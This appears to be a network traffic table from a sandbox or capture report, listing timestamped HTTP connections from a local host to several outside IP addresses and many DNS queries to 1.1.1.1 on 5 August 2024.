                                                                                                                                                                                                          Aug 5, 2024 16:23:14.264890909 CEST80497093.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.771369934 CEST80497093.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.772214890 CEST80497093.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.774360895 CEST4970980192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.776906967 CEST4970980192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.783245087 CEST80497093.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.594660997 CEST4971280192.168.2.7170.187.200.48
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.599700928 CEST8049712170.187.200.48192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.599788904 CEST4971280192.168.2.7170.187.200.48
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.599848986 CEST4971280192.168.2.7170.187.200.48
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.604943991 CEST8049712170.187.200.48192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.110980034 CEST8049712170.187.200.48192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.111160040 CEST8049712170.187.200.48192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.111236095 CEST4971280192.168.2.7170.187.200.48
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.111284018 CEST4971280192.168.2.7170.187.200.48
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.116209984 CEST8049712170.187.200.48192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.750214100 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.755048990 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.755119085 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.755304098 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.760118961 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628709078 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628727913 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628766060 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628777981 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628788948 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628818035 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628858089 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.629002094 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.631206989 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.631252050 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.633377075 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.633435965 CEST4971380192.168.2.7213.171.195.105
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.634927034 CEST8049713213.171.195.105192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.665146112 CEST4971480192.168.2.764.190.63.222
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.674597979 CEST804971464.190.63.222192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.674680948 CEST4971480192.168.2.764.190.63.222
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.674741983 CEST4971480192.168.2.764.190.63.222
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.681945086 CEST804971464.190.63.222192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.359216928 CEST804971464.190.63.222192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.359422922 CEST804971464.190.63.222192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.359484911 CEST4971480192.168.2.764.190.63.222
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.359519005 CEST4971480192.168.2.764.190.63.222
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.364831924 CEST804971464.190.63.222192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.533049107 CEST4971580192.168.2.754.244.188.177
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.542155027 CEST804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.542252064 CEST4971580192.168.2.754.244.188.177
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.542334080 CEST4971580192.168.2.754.244.188.177
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.549489975 CEST804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.353359938 CEST804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.353450060 CEST804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.353598118 CEST4971580192.168.2.754.244.188.177
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.353634119 CEST4971580192.168.2.754.244.188.177
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.358670950 CEST804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.883011103 CEST4971680192.168.2.781.169.145.88
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.892601013 CEST804971681.169.145.88192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.892690897 CEST4971680192.168.2.781.169.145.88
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.892755985 CEST4971680192.168.2.781.169.145.88
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.897691011 CEST804971681.169.145.88192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.542732000 CEST804971681.169.145.88192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.542943001 CEST4971680192.168.2.781.169.145.88
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.543235064 CEST804971681.169.145.88192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.543292999 CEST4971680192.168.2.781.169.145.88
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.547940016 CEST804971681.169.145.88192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.604696989 CEST4971780192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.609764099 CEST804971715.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.609869957 CEST4971780192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.609951019 CEST4971780192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.614748955 CEST804971715.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.152344942 CEST804971715.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.152359962 CEST804971715.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.152488947 CEST4971780192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.152559996 CEST4971780192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.160790920 CEST804971715.197.192.55192.168.2.7
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.116499901 CEST5800553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.127631903 CEST53580051.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.128492117 CEST5873353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.490065098 CEST53587331.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.490979910 CEST6384853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.734385967 CEST53638481.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.735596895 CEST6485253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.746968031 CEST53648521.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.747950077 CEST6228953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.081515074 CEST53622891.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.849172115 CEST6288153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.865104914 CEST53628811.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.865964890 CEST4942153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.879404068 CEST53494211.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.887386084 CEST4927953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.140649080 CEST53492791.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.141685009 CEST5055953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.153228998 CEST53505591.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.154092073 CEST6138653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.167778015 CEST53613861.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.168565035 CEST5579453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.408706903 CEST53557941.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.409615040 CEST5067453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.422204971 CEST53506741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.423027039 CEST5297953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.434189081 CEST53529791.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.434900999 CEST5527253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.676603079 CEST53552721.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.677520990 CEST6295553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.689861059 CEST53629551.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.184705973 CEST5624253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.345818043 CEST53562421.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.346751928 CEST5979253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.357867956 CEST53597921.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.358485937 CEST5410153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.368531942 CEST53541011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.369172096 CEST5683553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.381783962 CEST53568351.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.382386923 CEST5625953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.393115044 CEST53562591.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.394016981 CEST5463853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.403856039 CEST53546381.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.404695988 CEST6215253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.415358067 CEST53621521.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.415920019 CEST5523353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.591981888 CEST53552331.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.120335102 CEST5300653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.131587029 CEST53530061.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.132428885 CEST5832853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.144226074 CEST53583281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.144993067 CEST6095853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.140019894 CEST6095853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.333298922 CEST53609581.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.338663101 CEST5464053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.339821100 CEST53609581.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.584297895 CEST53546401.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.585304022 CEST5862053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.595113039 CEST53586201.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.596183062 CEST5806953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.607228041 CEST53580691.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.608077049 CEST5196753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.619980097 CEST53519671.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.620794058 CEST5161853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.869426966 CEST53516181.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.870515108 CEST5261153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.881941080 CEST53526111.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.882783890 CEST6431053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.123236895 CEST53643101.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.124109030 CEST6181653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.136425018 CEST53618161.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.137336016 CEST6472753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.148866892 CEST53647271.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.149853945 CEST6287953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.387614965 CEST53628791.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.388535023 CEST5546153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.403403044 CEST53554611.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.404055119 CEST5833753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.416208982 CEST53583371.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.419003010 CEST5604553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.669958115 CEST53560451.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.670917988 CEST5430453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690047026 CEST53543041.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690764904 CEST6071353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.703558922 CEST53607131.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.704890013 CEST5076353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.715862989 CEST53507631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.716545105 CEST5398553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.955599070 CEST53539851.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.956458092 CEST6015453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.972373962 CEST53601541.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.973203897 CEST6437653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.985363007 CEST53643761.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.986319065 CEST6143753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.998255014 CEST53614371.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.999150991 CEST5973053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.018498898 CEST53597301.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.019520044 CEST6322453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.264501095 CEST53632241.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.265332937 CEST5900353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.277185917 CEST53590031.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.278017044 CEST5577853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.313076973 CEST53557781.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.982986927 CEST4994453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.233246088 CEST53499441.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.234230995 CEST4928253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.253881931 CEST53492821.1.1.1192.168.2.7
Aug 5, 2024 16:23:14.778151989 CEST  53669  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.023370981 CEST  53     53669  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.024501085 CEST  49433  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.035974026 CEST  53     49433  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.036873102 CEST  57744  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.286478043 CEST  53     57744  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.287492990 CEST  60749  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.529511929 CEST  53     60749  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.530410051 CEST  54801  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.543267012 CEST  53     54801  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.543965101 CEST  57065  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.786616087 CEST  53     57065  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.788389921 CEST  50453  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.800870895 CEST  53     50453  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.802088022 CEST  50446  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.817239046 CEST  53     50446  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.818175077 CEST  57552  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:15.832911968 CEST  53     57552  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:15.833758116 CEST  52985  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.076066017 CEST  53     52985  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.076986074 CEST  65063  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.089200974 CEST  53     65063  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.089977026 CEST  57998  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.105436087 CEST  53     57998  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.106254101 CEST  55385  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.116499901 CEST  53     55385  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.118916988 CEST  59470  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.128622055 CEST  53     59470  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.135863066 CEST  49456  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.147651911 CEST  53     49456  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:16.148502111 CEST  62441  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:16.594046116 CEST  53     62441  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:17.111905098 CEST  57978  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:17.131805897 CEST  53     57978  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:17.132673979 CEST  56358  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:17.151833057 CEST  53     56358  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:17.155555010 CEST  60463  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:17.166604042 CEST  53     60463  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:17.176980972 CEST  60706  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:17.492526054 CEST  53     60706  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:17.493551970 CEST  62344  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:17.749679089 CEST  53     62344  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:18.629637957 CEST  56435  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:18.664453030 CEST  53     56435  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:19.360114098 CEST  58990  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:19.603269100 CEST  53     58990  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:19.604113102 CEST  51384  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:20.041341066 CEST  53     51384  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:20.042613983 CEST  56555  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:20.532397985 CEST  53     56555  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:21.354139090 CEST  62743  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:21.594518900 CEST  53     62743  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:21.599212885 CEST  60564  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:21.612550020 CEST  53     60564  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:21.615145922 CEST  50429  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:21.626259089 CEST  53     50429  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:21.626872063 CEST  55407  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:21.800091982 CEST  53     55407  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:21.801013947 CEST  53573  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.050182104 CEST  53     53573  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.051450968 CEST  59932  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.062438965 CEST  53     59932  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.063122034 CEST  50482  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.307908058 CEST  53     50482  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.308860064 CEST  54875  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.318873882 CEST  53     54875  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.321954966 CEST  58294  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.333545923 CEST  53     58294  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.334274054 CEST  50062  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.348253965 CEST  53     50062  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.349205017 CEST  64033  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.364134073 CEST  53     64033  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.364785910 CEST  52262  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.527837992 CEST  53     52262  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.528754950 CEST  54859  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.563729048 CEST  53     54859  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.564809084 CEST  53985  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.575617075 CEST  53     53985  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.576502085 CEST  49870  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.586731911 CEST  53     49870  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.587383986 CEST  51640  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.602020025 CEST  53     51640  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.602730989 CEST  63049  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.852274895 CEST  53     63049  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:22.853321075 CEST  53093  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:22.882518053 CEST  53     53093  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:23.543642044 CEST  61996  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:23.785722971 CEST  53     61996  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:23.786580086 CEST  55028  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.031197071 CEST  53     55028  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.032265902 CEST  51140  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.276823997 CEST  53     51140  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.278073072 CEST  61061  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.289036989 CEST  53     61061  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.289673090 CEST  56103  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.538819075 CEST  53     56103  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.539998055 CEST  51263  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.549678087 CEST  53     51263  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.550476074 CEST  50575  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.718214989 CEST  53     50575  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.729669094 CEST  50928  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.981952906 CEST  53     50928  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.982945919 CEST  55446  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:24.994797945 CEST  53     55446  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:24.995552063 CEST  49739  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:25.008431911 CEST  53     49739  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:25.009118080 CEST  60530  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:25.019424915 CEST  53     60530  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:25.019994974 CEST  61774  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:25.272799015 CEST  53     61774  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:25.274055004 CEST  53846  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:25.603921890 CEST  53     53846  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.153218985 CEST  50711  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.173346996 CEST  53     50711  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.174304962 CEST  56194  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.184062004 CEST  53     56194  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.184897900 CEST  51827  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.427146912 CEST  53     51827  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.428072929 CEST  52298  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.439620018 CEST  53     52298  1.1.1.1       192.168.2.7
